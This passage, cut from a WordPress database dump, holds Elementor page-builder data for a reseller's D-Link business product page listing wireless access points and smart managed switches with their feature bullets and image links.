detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7452,3393,'_elementor_version','2.5.14'),(7453,3393,'_elementor_edit_mode','builder'),(7456,3394,'_wp_page_template','template-fullwidth.php'),(7457,3394,'_elementor_template_type','post'),(7458,3394,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"280\",\"right\":\"280\",\"bottom\":\"280\",\"left\":\"280\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"68\",\"right\":\"68\",\"bottom\":\"68\",\"left\":\"68\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7459,3394,'_elementor_version','2.5.14'),(7460,3394,'_elementor_edit_mode','builder'),(7463,3395,'_wp_page_template','template-fullwidth.php'),(7464,3395,'_elementor_template_type','post'),(7465,3395,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product 